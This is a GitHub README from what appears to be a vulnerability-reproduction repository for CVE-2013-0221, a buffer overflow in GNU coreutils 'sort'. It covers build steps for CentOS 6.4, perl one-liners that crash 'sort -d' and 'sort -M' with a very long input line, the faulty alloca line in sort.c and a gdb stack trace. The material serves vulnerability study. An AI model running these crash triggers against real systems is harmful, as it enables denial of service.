Skip to content
Branch: master
Find file History
Pull request Compare This branch is 1 commit ahead, 3 commits behind mudongliang:master.
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
..
Failed to load latest commit information.
README.md

README.md

CVE-2013-0221 & EDB-38232

Experiment Environment

CentOS 6.4

INSTALL & Configuration

wget https://github.com/mudongliang/source-packages/raw/master/CVE-2013-0221/coreutils-8.4-patched.tar.gz

tar -xvf coreutils-8.4-patched.tar.gz
cd coreutils-8.4
./configure
make

Problems in Installation & Configuration

How to trigger vulnerability

    perl -e 'print "1","A"x50000000,"\r\n\r\n"' | sort -d

    perl -e 'print "1","A"x50000000,"\r\n\r\n"' | sort -M

PoCs

GNU Coreutils 'sort' Text Utility - Buffer Overflow

Vulnerability Details & Patch

Root Cause

sort.c:2632

	char *copy_a = (char *) alloca (lena + 1 + lenb + 1);

Stack Trace

(gdb) info stack
#0  0x08051bc0 in keycompare_mb (a=0xb6f00048, b=0xb6f00038) at sort.c:2722
#1  0x0804a556 in compare (a=0xb6f00048, b=0xb6f00038) at sort.c:2787
#2  0x0804cc52 in sortlines (lines=0xb6f00058, nlines=<value optimized out>, temp=0xb6f00038) at sort.c:3195
#3  0x0804fd52 in sort (argc=2, argv=0xbf8a9654) at sort.c:3496
#4  main (argc=2, argv=0xbf8a9654) at sort.c:4328

References

[1] CVE-2013-0221: coreutils: segmentation fault in "sort -d" and "sort -M" with long line input

You can’t perform that action at this time.